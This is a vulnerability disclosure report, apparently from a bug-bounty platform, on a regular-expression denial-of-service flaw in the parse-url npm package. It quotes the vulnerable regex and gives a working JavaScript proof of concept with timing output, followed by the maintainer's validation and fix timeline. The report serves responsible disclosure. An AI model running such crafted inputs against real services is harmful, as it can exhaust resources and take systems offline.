Regular Expression Denial of Service (ReDoS) in ionicabizau/parse-url

Valid

Reported on

Jul 4th 2022


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in parse-url.

It allows cause a denial of service when calling function parse-url.

The ReDoS vulnerability is mainly due to the regex /((git@|http(s)?:\/\/)([\w\.@]+)(\/|:))(([\~,\w,\-,\_,\/]+)(.git){0,1}((\/){0,1}))/ and can be exploited with the following code.

Proof of Concept

// PoC.js
const parseUrl = require("parse-url");
for (var i = 1; i <= 1000; i++) {
    var time = Date.now();
    var attack_str = 'git@'.repeat(i*10000)
    parseUrl(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}

The Output

"attack_str.length: 40000: 837 ms"
"attack_str.length: 80000: 2882 ms"
"attack_str.length: 120000: 6336 ms"
"attack_str.length: 160000: 11260 ms"
"attack_str.length: 200000: 17929 ms"

Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurrences

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. a month ago
Yeting Li modified the report
a month ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back a month ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. a month ago
Yeting Li modified the report
a month ago
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days. a month ago
Ionică Bizău (Johnny B.) validated this vulnerability 25 days ago

Thank you for this finding! I will work to address this.

Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 22 days ago
We have sent a second fix follow up to the ionicabizau/parse-url team. We will try again in 10 days. 15 days ago
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on b88c81 9 days ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
index.js#L40 has been validated
to join this conversation